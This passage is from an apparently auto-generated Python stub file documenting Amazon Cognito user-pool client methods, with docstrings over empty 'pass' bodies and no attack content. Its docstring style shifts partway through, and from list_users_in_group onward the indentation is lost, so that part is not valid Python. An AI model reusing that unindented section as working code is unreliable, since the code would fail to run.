            'PreSignedUrl': 'string',
            'CreationDate': datetime(2015, 1, 1),
            'StartDate': datetime(2015, 1, 1),
            'CompletionDate': datetime(2015, 1, 1),
            'Status': 'Created'|'Pending'|'InProgress'|'Stopping'|'Expired'|'Stopped'|'Failed'|'Succeeded',
            'CloudWatchLogsRoleArn': 'string',
            'ImportedUsers': 123,
            'SkippedUsers': 123,
            'FailedUsers': 123,
            'CompletionMessage': 'string'
        }
    }
    :returns:
        Created - The job was created but not started.
        Pending - A transition state. You have started the job, but it has not begun importing users yet.
        InProgress - The job has started, and users are being imported.
        Stopping - You have stopped the job, but the job has not stopped importing users yet.
        Stopped - You have stopped the job, and the job has stopped importing users.
        Succeeded - The job has completed successfully.
        Failed - The job has stopped due to an error.
        Expired - You created a job, but did not start the job within 24-48 hours. All data associated with the job was deleted, and the job cannot be started.
    """
    # Documentation stub: no executable implementation.
    pass
def create_user_pool(PoolName=None, Policies=None, LambdaConfig=None, AutoVerifiedAttributes=None, AliasAttributes=None, SmsVerificationMessage=None, EmailVerificationMessage=None, EmailVerificationSubject=None, SmsAuthenticationMessage=None, MfaConfiguration=None, DeviceConfiguration=None, EmailConfiguration=None, SmsConfiguration=None, UserPoolTags=None, AdminCreateUserConfig=None, Schema=None):
    """
    Creates a new Amazon Cognito user pool and sets the password policy for the pool.
    See also: AWS API Documentation

    :example: response = client.create_user_pool(
        PoolName='string',
        Policies={
            'PasswordPolicy': {
                'MinimumLength': 123,
                'RequireUppercase': True|False,
                'RequireLowercase': True|False,
                'RequireNumbers': True|False,
                'RequireSymbols': True|False
            }
        },
        LambdaConfig={
            'PreSignUp': 'string',
            'CustomMessage': 'string',
            'PostConfirmation': 'string',
            'PreAuthentication': 'string',
            'PostAuthentication': 'string',
            'DefineAuthChallenge': 'string',
            'CreateAuthChallenge': 'string',
            'VerifyAuthChallengeResponse': 'string'
        },
        AutoVerifiedAttributes=[
            'phone_number'|'email',
        ],
        AliasAttributes=[
            'phone_number'|'email'|'preferred_username',
        ],
        SmsVerificationMessage='string',
        EmailVerificationMessage='string',
        EmailVerificationSubject='string',
        SmsAuthenticationMessage='string',
        MfaConfiguration='OFF'|'ON'|'OPTIONAL',
        DeviceConfiguration={
            'ChallengeRequiredOnNewDevice': True|False,
            'DeviceOnlyRememberedOnUserPrompt': True|False
        },
        EmailConfiguration={
            'SourceArn': 'string',
            'ReplyToEmailAddress': 'string'
        },
        SmsConfiguration={
            'SnsCallerArn': 'string',
            'ExternalId': 'string'
        },
        UserPoolTags={
            'string': 'string'
        },
        AdminCreateUserConfig={
            'AllowAdminCreateUserOnly': True|False,
            'UnusedAccountValidityDays': 123,
            'InviteMessageTemplate': {
                'SMSMessage': 'string',
                'EmailMessage': 'string',
                'EmailSubject': 'string'
            }
        },
        Schema=[
            {
                'Name': 'string',
                'AttributeDataType': 'String'|'Number'|'DateTime'|'Boolean',
                'DeveloperOnlyAttribute': True|False,
                'Mutable': True|False,
                'Required': True|False,
                'NumberAttributeConstraints': {
                    'MinValue': 'string',
                    'MaxValue': 'string'
                },
                'StringAttributeConstraints': {
                    'MinLength': 'string',
                    'MaxLength': 'string'
                }
            },
        ]
    )

    :type PoolName: string
    :param PoolName: [REQUIRED]
        A string used to name the user pool.
    :type Policies: dict
    :param Policies: The policies associated with the new user pool.
        PasswordPolicy (dict) --A container for information about the user pool password policy.
        MinimumLength (integer) --The minimum length of the password policy that you have set. Cannot be less than 6.
        RequireUppercase (boolean) --In the password policy that you have set, refers to whether you have required users to use at least one uppercase letter in their password.
        RequireLowercase (boolean) --In the password policy that you have set, refers to whether you have required users to use at least one lowercase letter in their password.
        RequireNumbers (boolean) --In the password policy that you have set, refers to whether you have required users to use at least one number in their password.
        RequireSymbols (boolean) --In the password policy that you have set, refers to whether you have required users to use at least one symbol in their password.
    :type LambdaConfig: dict
    :param LambdaConfig: The Lambda trigger configuration information for the new user pool.
        PreSignUp (string) --A pre-registration AWS Lambda trigger.
        CustomMessage (string) --A custom Message AWS Lambda trigger.
        PostConfirmation (string) --A post-confirmation AWS Lambda trigger.
        PreAuthentication (string) --A pre-authentication AWS Lambda trigger.
        PostAuthentication (string) --A post-authentication AWS Lambda trigger.
        DefineAuthChallenge (string) --Defines the authentication challenge.
        CreateAuthChallenge (string) --Creates an authentication challenge.
        VerifyAuthChallengeResponse (string) --Verifies the authentication challenge response.
    :type AutoVerifiedAttributes: list
    :param AutoVerifiedAttributes: The attributes to be auto-verified. Possible values: email , phone_number .
        (string) --
    :type AliasAttributes: list
    :param AliasAttributes: Attributes supported as an alias for this user pool. Possible values: phone_number , email , or preferred_username .
        (string) --
    :type SmsVerificationMessage: string
    :param SmsVerificationMessage: A string representing the SMS verification message.
    :type EmailVerificationMessage: string
    :param EmailVerificationMessage: A string representing the email verification message.
    :type EmailVerificationSubject: string
    :param EmailVerificationSubject: A string representing the email verification subject.
    :type SmsAuthenticationMessage: string
    :param SmsAuthenticationMessage: A string representing the SMS authentication message.
    :type MfaConfiguration: string
    :param MfaConfiguration: Specifies MFA configuration details.
    :type DeviceConfiguration: dict
    :param DeviceConfiguration: The device configuration.
        ChallengeRequiredOnNewDevice (boolean) --Indicates whether a challenge is required on a new device. Only applicable to a new device.
        DeviceOnlyRememberedOnUserPrompt (boolean) --If true, a device is only remembered on user prompt.
    :type EmailConfiguration: dict
    :param EmailConfiguration: The email configuration.
        SourceArn (string) --The Amazon Resource Name (ARN) of the email source.
        ReplyToEmailAddress (string) --The REPLY-TO email address.
    :type SmsConfiguration: dict
    :param SmsConfiguration: The SMS configuration.
        SnsCallerArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the Amazon Simple Notification Service (SNS) caller.
        ExternalId (string) --The external ID.
    :type UserPoolTags: dict
    :param UserPoolTags: The cost allocation tags for the user pool. For more information, see Adding Cost Allocation Tags to Your User Pool
        (string) --
        (string) --
    :type AdminCreateUserConfig: dict
    :param AdminCreateUserConfig: The configuration for AdminCreateUser requests.
        AllowAdminCreateUserOnly (boolean) --Set to True if only the administrator is allowed to create user profiles. Set to False if users can sign themselves up via an app.
        UnusedAccountValidityDays (integer) --The user account expiration limit, in days, after which the account is no longer usable. To reset the account after that time limit, you must call AdminCreateUser again, specifying 'RESEND' for the MessageAction parameter. The default value for this parameter is 7.
        InviteMessageTemplate (dict) --The message template to be used for the welcome message to new users.
        SMSMessage (string) --The message template for SMS messages.
        EmailMessage (string) --The message template for email messages.
        EmailSubject (string) --The subject line for email messages.
    :type Schema: list
    :param Schema: An array of schema attributes for the new user pool. These attributes can be standard or custom attributes.
        (dict) --Contains information about the schema attribute.
        Name (string) --A schema attribute of the name type.
        AttributeDataType (string) --The attribute data type.
        DeveloperOnlyAttribute (boolean) --Specifies whether the attribute type is developer only.
        Mutable (boolean) --Specifies whether the attribute can be changed once it has been created.
        Required (boolean) --Specifies whether a user pool attribute is required. If the attribute is required and the user does not provide a value, registration or sign-in will fail.
        NumberAttributeConstraints (dict) --Specifies the constraints for an attribute of the number type.
        MinValue (string) --The minimum value of an attribute that is of the number data type.
        MaxValue (string) --The maximum value of an attribute that is of the number data type.
        StringAttributeConstraints (dict) --Specifies the constraints for an attribute of the string type.
        MinLength (string) --The minimum length of an attribute value of the string type.
        MaxLength (string) --The maximum length of an attribute value of the string type.
    :rtype: dict
    :return: {
        'UserPool': {
            'Id': 'string',
            'Name': 'string',
            'Policies': {
                'PasswordPolicy': {
                    'MinimumLength': 123,
                    'RequireUppercase': True|False,
                    'RequireLowercase': True|False,
                    'RequireNumbers': True|False,
                    'RequireSymbols': True|False
                }
            },
            'LambdaConfig': {
                'PreSignUp': 'string',
                'CustomMessage': 'string',
                'PostConfirmation': 'string',
                'PreAuthentication': 'string',
                'PostAuthentication': 'string',
                'DefineAuthChallenge': 'string',
                'CreateAuthChallenge': 'string',
                'VerifyAuthChallengeResponse': 'string'
            },
            'Status': 'Enabled'|'Disabled',
            'LastModifiedDate': datetime(2015, 1, 1),
            'CreationDate': datetime(2015, 1, 1),
            'SchemaAttributes': [
                {
                    'Name': 'string',
                    'AttributeDataType': 'String'|'Number'|'DateTime'|'Boolean',
                    'DeveloperOnlyAttribute': True|False,
                    'Mutable': True|False,
                    'Required': True|False,
                    'NumberAttributeConstraints': {
                        'MinValue': 'string',
                        'MaxValue': 'string'
                    },
                    'StringAttributeConstraints': {
                        'MinLength': 'string',
                        'MaxLength': 'string'
                    }
                },
            ],
            'AutoVerifiedAttributes': [
                'phone_number'|'email',
            ],
            'AliasAttributes': [
                'phone_number'|'email'|'preferred_username',
            ],
            'SmsVerificationMessage': 'string',
            'EmailVerificationMessage': 'string',
            'EmailVerificationSubject': 'string',
            'SmsAuthenticationMessage': 'string',
            'MfaConfiguration': 'OFF'|'ON'|'OPTIONAL',
            'DeviceConfiguration': {
                'ChallengeRequiredOnNewDevice': True|False,
                'DeviceOnlyRememberedOnUserPrompt': True|False
            },
            'EstimatedNumberOfUsers': 123,
            'EmailConfiguration': {
                'SourceArn': 'string',
                'ReplyToEmailAddress': 'string'
            },
            'SmsConfiguration': {
                'SnsCallerArn': 'string',
                'ExternalId': 'string'
            },
            'UserPoolTags': {
                'string': 'string'
            },
            'SmsConfigurationFailure': 'string',
            'EmailConfigurationFailure': 'string',
            'AdminCreateUserConfig': {
                'AllowAdminCreateUserOnly': True|False,
                'UnusedAccountValidityDays': 123,
                'InviteMessageTemplate': {
                    'SMSMessage': 'string',
                    'EmailMessage': 'string',
                    'EmailSubject': 'string'
                }
            }
        }
    }
    :returns:
        (string) --
    """
    # Documentation stub: no executable implementation.
    pass
def create_user_pool_client(UserPoolId=None, ClientName=None, GenerateSecret=None, RefreshTokenValidity=None, ReadAttributes=None, WriteAttributes=None, ExplicitAuthFlows=None, SupportedIdentityProviders=None, CallbackURLs=None, LogoutURLs=None, DefaultRedirectURI=None, AllowedOAuthFlows=None, AllowedOAuthScopes=None, AllowedOAuthFlowsUserPoolClient=None):
    """Create a client for a user pool.

    See also: AWS API Documentation.

    Args:
        UserPoolId (string): [REQUIRED] ID of the user pool in which to
            create the client.
        ClientName (string): [REQUIRED] Name for the new user pool client.
        GenerateSecret (boolean): Whether to generate a secret for the
            client being created.
        RefreshTokenValidity (integer): Time limit, in days, after which
            the refresh token is no longer valid.
        ReadAttributes (list of string): The read attributes.
        WriteAttributes (list of string): The write attributes.
        ExplicitAuthFlows (list): Explicit authentication flows; values are
            'ADMIN_NO_SRP_AUTH' or 'CUSTOM_AUTH_FLOW_ONLY'.
        SupportedIdentityProviders (list of string): Names of the identity
            providers supported on this client.
        CallbackURLs (list of string): Allowed callback URLs for the
            identity providers.
        LogoutURLs (list of string): Allowed logout URLs for the identity
            providers.
        DefaultRedirectURI (string): Default redirect URI; must be present
            in the CallbackURLs list.
        AllowedOAuthFlows (list): OAuth flows to allow; values are 'code',
            'implicit', and 'client_credentials'. 'code' initiates a code
            grant flow returning an authorization code exchangeable for
            tokens at the token endpoint; 'token' makes the client receive
            the access token (and optionally ID token) directly.
        AllowedOAuthScopes (list of string): Allowed OAuth scopes;
            currently supported values are 'phone', 'email', 'openid',
            and 'Cognito'.
        AllowedOAuthFlowsUserPoolClient (boolean): Set to True if the
            client may follow the OAuth protocol when interacting with
            Cognito user pools.

    Returns:
        dict: {'UserPoolClient': {...}} describing the created client —
        its IDs, name, secret, creation/modification timestamps, refresh
        token validity, read/write attributes, auth flows, identity
        providers, callback/logout URLs, and OAuth settings.
    """
    pass
def create_user_pool_domain(Domain=None, UserPoolId=None):
    """Create a new domain for a user pool.

    See also: AWS API Documentation.

    Args:
        Domain (string): [REQUIRED] The domain string.
        UserPoolId (string): [REQUIRED] The user pool ID.

    Returns:
        dict: An empty dict ({}).
    """
    pass
def delete_group(GroupName=None, UserPoolId=None):
    """Delete a group; currently only groups with no members can be deleted.

    Requires developer credentials.
    See also: AWS API Documentation.

    Args:
        GroupName (string): [REQUIRED] The name of the group.
        UserPoolId (string): [REQUIRED] The user pool ID for the user pool.
    """
    pass
def delete_identity_provider(UserPoolId=None, ProviderName=None):
    """Delete an identity provider for a user pool.

    See also: AWS API Documentation.

    Args:
        UserPoolId (string): [REQUIRED] The user pool ID.
        ProviderName (string): [REQUIRED] The identity provider name.
    """
    pass
def delete_user(AccessToken=None):
    """Allow a user to delete one's self.

    See also: AWS API Documentation.

    Args:
        AccessToken (string): [REQUIRED] The access token from a request
            to delete a user.
    """
    pass
def delete_user_attributes(UserAttributeNames=None, AccessToken=None):
    """Delete attributes for a user.

    See also: AWS API Documentation.

    Args:
        UserAttributeNames (list of string): [REQUIRED] The user attribute
            names to delete. For custom attributes, prepend the custom:
            prefix to the attribute name.
        AccessToken (string): [REQUIRED] The access token used in the
            request to delete user attributes.

    Returns:
        dict: An empty dict ({}).
    """
    pass
def delete_user_pool(UserPoolId=None):
    """Delete the specified Amazon Cognito user pool.

    See also: AWS API Documentation.

    Args:
        UserPoolId (string): [REQUIRED] The user pool ID for the user pool
            you want to delete.
    """
    pass
def delete_user_pool_client(UserPoolId=None, ClientId=None):
    """Allow the developer to delete the user pool client.

    See also: AWS API Documentation.

    Args:
        UserPoolId (string): [REQUIRED] The user pool ID for the user pool
            where you want to delete the client.
        ClientId (string): [REQUIRED] The ID of the client associated with
            the user pool.
    """
    pass
def delete_user_pool_domain(Domain=None, UserPoolId=None):
    """Delete a domain for a user pool.

    See also: AWS API Documentation.

    Args:
        Domain (string): [REQUIRED] The domain string.
        UserPoolId (string): [REQUIRED] The user pool ID.

    Returns:
        dict: An empty dict ({}).
    """
    pass
def describe_identity_provider(UserPoolId=None, ProviderName=None):
    """Get information about a specific identity provider.

    See also: AWS API Documentation.

    Args:
        UserPoolId (string): [REQUIRED] The user pool ID.
        ProviderName (string): [REQUIRED] The identity provider name.

    Returns:
        dict: {'IdentityProvider': {...}} with the provider's user pool
        ID, name, type (e.g. 'SAML'), provider details and attribute
        mapping (string-to-string maps), IdP identifiers, and
        creation/last-modified timestamps.
    """
    pass
def describe_user_import_job(UserPoolId=None, JobId=None):
    """Describe the user import job.

    See also: AWS API Documentation.

    Args:
        UserPoolId (string): [REQUIRED] The user pool ID for the user pool
            that the users are being imported into.
        JobId (string): [REQUIRED] The job ID for the user import job.

    Returns:
        dict: {'UserImportJob': {...}} with the job's name, IDs,
        pre-signed URL, creation/start/completion timestamps, status,
        CloudWatch Logs role ARN, imported/skipped/failed user counts,
        and completion message. Job status values:

        * Created - The job was created but not started.
        * Pending - A transition state; the job has been started but has
          not begun importing users yet.
        * InProgress - The job has started, and users are being imported.
        * Stopping - The job has been stopped but has not stopped
          importing users yet.
        * Stopped - The job has been stopped and has stopped importing
          users.
        * Succeeded - The job has completed successfully.
        * Failed - The job has stopped due to an error.
        * Expired - The job was created but not started within 24-48
          hours; all data associated with the job was deleted and the job
          cannot be started.
    """
    pass
def describe_user_pool(UserPoolId=None):
    """Return the configuration information and metadata of the specified user pool.

    See also: AWS API Documentation.

    Args:
        UserPoolId (string): [REQUIRED] The user pool ID for the user pool
            you want to describe.

    Returns:
        dict: {'UserPool': {...}} with the pool's ID, name, password
        policies, Lambda trigger configuration (pre/post sign-up,
        confirmation, authentication, and custom-challenge hooks), status,
        timestamps, schema attributes (name, data type, mutability,
        number/string constraints), auto-verified and alias attributes,
        SMS/email verification and authentication messages, MFA
        configuration ('OFF'|'ON'|'OPTIONAL'), device configuration,
        estimated user count, email and SMS configuration (and failure
        info), user pool tags, and admin create-user settings including
        the invite message template.
    """
    pass
def describe_user_pool_client(UserPoolId=None, ClientId=None):
    """Return the configuration information and metadata of the specified user pool client.

    See also: AWS API Documentation.

    Args:
        UserPoolId (string): [REQUIRED] The user pool ID for the user pool
            you want to describe.
        ClientId (string): [REQUIRED] The ID of the client associated with
            the user pool.

    Returns:
        dict: {'UserPoolClient': {...}} with the client's pool ID, name,
        client ID and secret, timestamps, refresh token validity,
        read/write attributes, explicit auth flows, supported identity
        providers, callback/logout URLs, default redirect URI, and
        allowed OAuth flows/scopes settings.
    """
    pass
def describe_user_pool_domain(Domain=None):
    """Get information about a domain.

    See also: AWS API Documentation.

    Args:
        Domain (string): [REQUIRED] The domain string.

    Returns:
        dict: {'DomainDescription': {...}} with the domain's user pool ID,
        AWS account ID, domain name, S3 bucket, CloudFront distribution,
        version, and status ('CREATING'|'DELETING'|'UPDATING'|'ACTIVE').
    """
    pass
def forget_device(AccessToken=None, DeviceKey=None):
    """Forget the specified device.

    See also: AWS API Documentation.

    Args:
        AccessToken (string): The access token for the forgotten device
            request.
        DeviceKey (string): [REQUIRED] The device key.
    """
    pass
def forgot_password(ClientId=None, SecretHash=None, Username=None):
    """Send the end user a confirmation code required to change the user's password.

    For the Username parameter, you can use the username or user alias.
    If a verified phone number exists for the user, the confirmation code
    is sent there; otherwise, if a verified email exists, it is sent to
    the email. If neither exists, InvalidParameterException is thrown. To
    use the confirmation code for resetting the password, call
    ConfirmForgotPassword.
    See also: AWS API Documentation.

    Args:
        ClientId (string): [REQUIRED] The ID of the client associated with
            the user pool.
        SecretHash (string): A keyed-hash message authentication code
            (HMAC) calculated using the secret key of a user pool client
            and username plus the client ID in the message.
        Username (string): [REQUIRED] The user name of the user for whom
            you want to enter a code to reset a forgotten password.

    Returns:
        dict: {'CodeDeliveryDetails': {'Destination': ...,
        'DeliveryMedium': 'SMS'|'EMAIL', 'AttributeName': ...}}.
    """
    pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
    """Generate a presigned url given a client, its method, and arguments.

    Args:
        ClientMethod (string): The client method to presign for.
        Params (dict): The parameters normally passed to ClientMethod.
        ExpiresIn (int): The number of seconds the presigned url is valid
            for; by default it expires in an hour (3600 seconds).
        HttpMethod (string): The http method to use on the generated url;
            by default, whatever is used in the method's model.
    """
    pass
def get_csv_header(UserPoolId=None):
    """Get the header information for the .csv file used as input for the user import job.

    See also: AWS API Documentation.

    Args:
        UserPoolId (string): [REQUIRED] The user pool ID for the user pool
            that the users are to be imported into.

    Returns:
        dict: {'UserPoolId': ..., 'CSVHeader': [list of header strings]}.
    """
    pass
def get_device(DeviceKey=None, AccessToken=None):
    """Get the device.

    See also: AWS API Documentation.

    Args:
        DeviceKey (string): [REQUIRED] The device key.
        AccessToken (string): The access token.

    Returns:
        dict: {'Device': {...}} with the device key, a list of
        name/value device attributes, and the device's creation,
        last-modified, and last-authenticated timestamps.
    """
    pass
def get_group(GroupName=None, UserPoolId=None):
    """Get a group.

    Requires developer credentials.
    See also: AWS API Documentation.

    Args:
        GroupName (string): [REQUIRED] The name of the group.
        UserPoolId (string): [REQUIRED] The user pool ID for the user pool.

    Returns:
        dict: {'Group': {...}} with the group's name, user pool ID,
        description, role ARN, precedence, and creation/last-modified
        timestamps.
    """
    pass
def get_identity_provider_by_identifier(UserPoolId=None, IdpIdentifier=None):
    """Get the specified identity provider.

    See also: AWS API Documentation.

    Args:
        UserPoolId (string): [REQUIRED] The user pool ID.
        IdpIdentifier (string): [REQUIRED] The identity provider ID.

    Returns:
        dict: {'IdentityProvider': {...}} with the provider's user pool
        ID, name, type (e.g. 'SAML'), provider details and attribute
        mapping (string-to-string maps), IdP identifiers, and
        creation/last-modified timestamps.
    """
    pass
def get_paginator(operation_name=None):
    """Create a paginator for an operation.

    Args:
        operation_name (string): The operation name. This is the same name
            as the method name on the client. For example, if the method
            name is create_foo, and you'd normally invoke the operation as
            client.create_foo(**kwargs), if the create_foo operation can
            be paginated, you can use the call
            client.get_paginator('create_foo').

    Returns:
        L{botocore.paginate.Paginator}: A paginator object.
    """
    pass
def get_user(AccessToken=None):
    """Get the user attributes and metadata for a user.

    See also: AWS API Documentation.

    Args:
        AccessToken (string): [REQUIRED] The access token returned by the
            server response to get information about the user.

    Returns:
        dict: {'Username': ..., 'UserAttributes': [name/value pairs],
        'MFAOptions': [{'DeliveryMedium': 'SMS'|'EMAIL',
        'AttributeName': ...}]}.
    """
    pass
def get_user_attribute_verification_code(AccessToken=None, AttributeName=None):
    """Get the user attribute verification code for the specified attribute name.

    See also: AWS API Documentation.

    Args:
        AccessToken (string): [REQUIRED] The access token returned by the
            server response to get the user attribute verification code.
        AttributeName (string): [REQUIRED] The attribute name returned by
            the server response to get the user attribute verification
            code.

    Returns:
        dict: {'CodeDeliveryDetails': {'Destination': ...,
        'DeliveryMedium': 'SMS'|'EMAIL', 'AttributeName': ...}}.
    """
    pass
def get_waiter():
    """Return a waiter for this client.

    NOTE(review): the generated stub carries no documentation for this
    method; confirm the intended signature and behavior against the
    botocore client documentation.
    """
    pass
def global_sign_out(AccessToken=None):
    """Sign out users from all devices.

    See also: AWS API Documentation.

    Args:
        AccessToken (string): [REQUIRED] The access token.

    Returns:
        dict: An empty dict ({}).
    """
    pass
def initiate_auth(AuthFlow=None, AuthParameters=None, ClientMetadata=None, ClientId=None):
    """Initiate the authentication flow.

    See also: AWS API Documentation.

    Args:
        AuthFlow (string): [REQUIRED] The authentication flow for this
            call to execute; the API action depends on this value. Valid
            values:

            * USER_SRP_AUTH: Secure Remote Password (SRP) protocol flow;
              takes USERNAME and SRPA and returns the SRP variables for
              the next challenge execution.
            * REFRESH_TOKEN_AUTH / REFRESH_TOKEN: takes a valid refresh
              token and returns new access and ID tokens.
            * CUSTOM_AUTH: Custom authentication flow.

            ADMIN_NO_SRP_AUTH is not a valid value.
        AuthParameters (dict): The authentication parameters (inputs
            corresponding to the AuthFlow being invoked):

            * USER_SRP_AUTH: USERNAME (required), SRPA (required),
              SECRET_HASH (required if the app client has a client
              secret), DEVICE_KEY.
            * REFRESH_TOKEN_AUTH/REFRESH_TOKEN: USERNAME (required),
              SECRET_HASH (required if the app client has a client
              secret), REFRESH_TOKEN (required), DEVICE_KEY.
            * CUSTOM_AUTH: USERNAME (required), SECRET_HASH (if the app
              client has a client secret), DEVICE_KEY.
        ClientMetadata (dict): A random key-value pair map which can
            contain any key and is passed to your PreAuthentication
            Lambda trigger as-is; usable for additional validations
            around authentication.
        ClientId (string): [REQUIRED] The app client ID.

    Returns:
        dict: {'ChallengeName': ..., 'Session': ...,
        'ChallengeParameters': {...}, 'AuthenticationResult': {...}}.
        ChallengeName values:

        * SMS_MFA: supply an SMS_MFA_CODE, delivered via SMS.
        * PASSWORD_VERIFIER: supply PASSWORD_CLAIM_SIGNATURE,
          PASSWORD_CLAIM_SECRET_BLOCK, and TIMESTAMP after the
          client-side SRP calculations.
        * CUSTOM_CHALLENGE: the custom authentication flow determined the
          user should pass another challenge before tokens are issued.
        * DEVICE_SRP_AUTH: device tracking was enabled and previous
          challenges passed; Amazon Cognito can start tracking this
          device.
        * DEVICE_PASSWORD_VERIFIER: like PASSWORD_VERIFIER, but for
          devices only.
        * NEW_PASSWORD_REQUIRED: the user must change their password
          after first login; pass NEW_PASSWORD and any other required
          attributes.
    """
    pass
def list_devices(AccessToken=None, Limit=None, PaginationToken=None):
    """List the devices.

    See also: AWS API Documentation.

    Args:
        AccessToken (string): [REQUIRED] The access tokens for the request
            to list devices.
        Limit (integer): The limit of the device request.
        PaginationToken (string): The pagination token for the list
            request.

    Returns:
        dict: {'Devices': [device records with key, name/value
        attributes, and creation/modification/authentication timestamps],
        'PaginationToken': ...}.
    """
    pass
def list_groups(UserPoolId=None, Limit=None, NextToken=None):
    """List the groups associated with a user pool.

    Requires developer credentials.
    See also: AWS API Documentation.

    Args:
        UserPoolId (string): [REQUIRED] The user pool ID for the user pool.
        Limit (integer): The limit of the request to list groups.
        NextToken (string): An identifier returned from the previous call
            to this operation, used to return the next set of items.

    Returns:
        dict: {'Groups': [group records with name, user pool ID,
        description, role ARN, precedence, and timestamps],
        'NextToken': ...}.
    """
    pass
def list_identity_providers(UserPoolId=None, MaxResults=None, NextToken=None):
    """List information about all identity providers for a user pool.

    See also: AWS API Documentation.

    Args:
        UserPoolId (string): [REQUIRED] The user pool ID.
        MaxResults (integer): The maximum number of identity providers to
            return.
        NextToken (string): A pagination token.

    Returns:
        dict: {'Providers': [provider records with name, type (e.g.
        'SAML'), and creation/last-modified timestamps], 'NextToken': ...}.
    """
    pass
def list_user_import_jobs(UserPoolId=None, MaxResults=None, PaginationToken=None):
    """List the user import jobs.

    See also: AWS API Documentation.

    Args:
        UserPoolId (string): [REQUIRED] The user pool ID for the user pool
            that the users are being imported into.
        MaxResults (integer): [REQUIRED] The maximum number of import jobs
            you want the request to return.
        PaginationToken (string): An identifier returned from the previous
            call to ListUserImportJobs, used to return the next set of
            import jobs.

    Returns:
        dict: {'UserImportJobs': [job records with names, IDs,
        pre-signed URL, timestamps, status, CloudWatch Logs role ARN,
        imported/skipped/failed counts, and completion message],
        'PaginationToken': ...}. Job status values:

        * Created - The job was created but not started.
        * Pending - A transition state; the job has been started but has
          not begun importing users yet.
        * InProgress - The job has started, and users are being imported.
        * Stopping - The job has been stopped but has not stopped
          importing users yet.
        * Stopped - The job has been stopped and has stopped importing
          users.
        * Succeeded - The job has completed successfully.
        * Failed - The job has stopped due to an error.
        * Expired - The job was created but not started within 24-48
          hours; all data associated with the job was deleted and the job
          cannot be started.
    """
    pass
def list_user_pool_clients(UserPoolId=None, MaxResults=None, NextToken=None):
    """List the clients that have been created for the specified user pool.

    See also: AWS API Documentation.

    Args:
        UserPoolId (string): [REQUIRED] The user pool ID for the user pool
            where you want to list user pool clients.
        MaxResults (integer): The maximum number of results you want the
            request to return when listing the user pool clients.
        NextToken (string): An identifier returned from the previous call
            to this operation, used to return the next set of items.

    Returns:
        dict: {'UserPoolClients': [{'ClientId': ..., 'UserPoolId': ...,
        'ClientName': ...}], 'NextToken': ...}.
    """
    pass
def list_user_pools(NextToken=None, MaxResults=None):
    """List the user pools associated with an AWS account.

    See also: AWS API Documentation.

    Args:
        NextToken (string): An identifier returned from the previous call
            to this operation, used to return the next set of items.
        MaxResults (integer): [REQUIRED] The maximum number of results you
            want the request to return when listing the user pools.

    Returns:
        dict: {'UserPools': [pool records with ID, name, Lambda trigger
        configuration, status ('Enabled'|'Disabled'), and
        creation/last-modified timestamps], 'NextToken': ...}.
    """
    pass
def list_users(UserPoolId=None, AttributesToGet=None, Limit=None, PaginationToken=None, Filter=None):
    """List the users in the Amazon Cognito user pool.

    See also: AWS API Documentation.

    Args:
        UserPoolId (string): [REQUIRED] The user pool ID for the user pool
            on which the search should be performed.
        AttributesToGet (list of string): Names of user attributes to
            return for each user in the search results. If the array is
            empty, all attributes are returned.
        Limit (integer): Maximum number of users to be returned.
        PaginationToken (string): An identifier returned from the previous
            call to this operation, used to return the next set of items.
        Filter (string): A filter string of the form
            'AttributeName Filter-Type 'AttributeValue''. Quotation marks
            within the filter string must be escaped with the backslash
            character, e.g. 'family_name = 'Reddy''.

            * AttributeName: the attribute to search for (one at a time).
            * Filter-Type: '=' for an exact match (e.g.
              'given_name = 'Jon''); '^=' for a prefix / 'starts with'
              match (e.g. 'given_name ^= 'Jon'').
            * AttributeValue: the value that must be matched.

            An empty filter string returns all users. Only these standard
            attributes are searchable: username (case-sensitive), email,
            phone_number, name, given_name, family_name,
            preferred_username, cognito:user_status (called Enabled in
            the Console, case-sensitive), status (case-insensitive).
            Custom attributes are not searchable. See Searching for Users
            Using the ListUsers API and Examples of Using the ListUsers
            API in the Amazon Cognito Developer Guide.

    Returns:
        dict: {'Users': [user records with Username, Attributes,
        creation/modification timestamps, Enabled flag, UserStatus, and
        MFAOptions], 'PaginationToken': ...}. UserStatus values:

        * UNCONFIRMED - User has been created but not confirmed.
        * CONFIRMED - User has been confirmed.
        * ARCHIVED - User is no longer active.
        * COMPROMISED - User is disabled due to a potential security
          threat.
        * UNKNOWN - User status is not known.
    """
    pass
def list_users_in_group(UserPoolId=None, GroupName=None, Limit=None, NextToken=None):
"""
Lists the users in the specified group.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.list_users_in_group(
UserPoolId='string',
GroupName='string',
Limit=123,
NextToken='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool.
:type GroupName: string
:param GroupName: [REQUIRED]
The name of the group.
:type Limit: integer
:param Limit: The limit of the request to list users.
:type NextToken: string
:param NextToken: An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
:rtype: dict
:return: {
'Users': [
{
'Username': 'string',
'Attributes': [
{
'Name': 'string',
'Value': 'string'
},
],
'UserCreateDate': datetime(2015, 1, 1),
'UserLastModifiedDate': datetime(2015, 1, 1),
'Enabled': True|False,
'UserStatus': 'UNCONFIRMED'|'CONFIRMED'|'ARCHIVED'|'COMPROMISED'|'UNKNOWN'|'RESET_REQUIRED'|'FORCE_CHANGE_PASSWORD',
'MFAOptions': [
{
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
},
]
},
],
'NextToken': 'string'
}
:returns:
UNCONFIRMED - User has been created but not confirmed.
CONFIRMED - User has been confirmed.
ARCHIVED - User is no longer active.
COMPROMISED - User is disabled due to a potential security threat.
UNKNOWN - User status is not known.
"""
pass
def resend_confirmation_code(ClientId=None, SecretHash=None, Username=None):
"""
Resends the confirmation (for confirmation of registration) to a specific user in the user pool.
See also: AWS API Documentation
:example: response = client.resend_confirmation_code(
ClientId='string',
SecretHash='string',
Username='string'
)
:type ClientId: string
:param ClientId: [REQUIRED]
The ID of the client associated with the user pool.
:type SecretHash: string
:param SecretHash: A keyed-hash message authentication code (HMAC) calculated using the secret key of a user pool client and username plus the client ID in the message.
:type Username: string
:param Username: [REQUIRED]
The user name of the user to whom you wish to resend a confirmation code.
:rtype: dict
:return: {
'CodeDeliveryDetails': {
'Destination': 'string',
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
}
}
"""
pass
def respond_to_auth_challenge(ClientId=None, ChallengeName=None, Session=None, ChallengeResponses=None):
"""
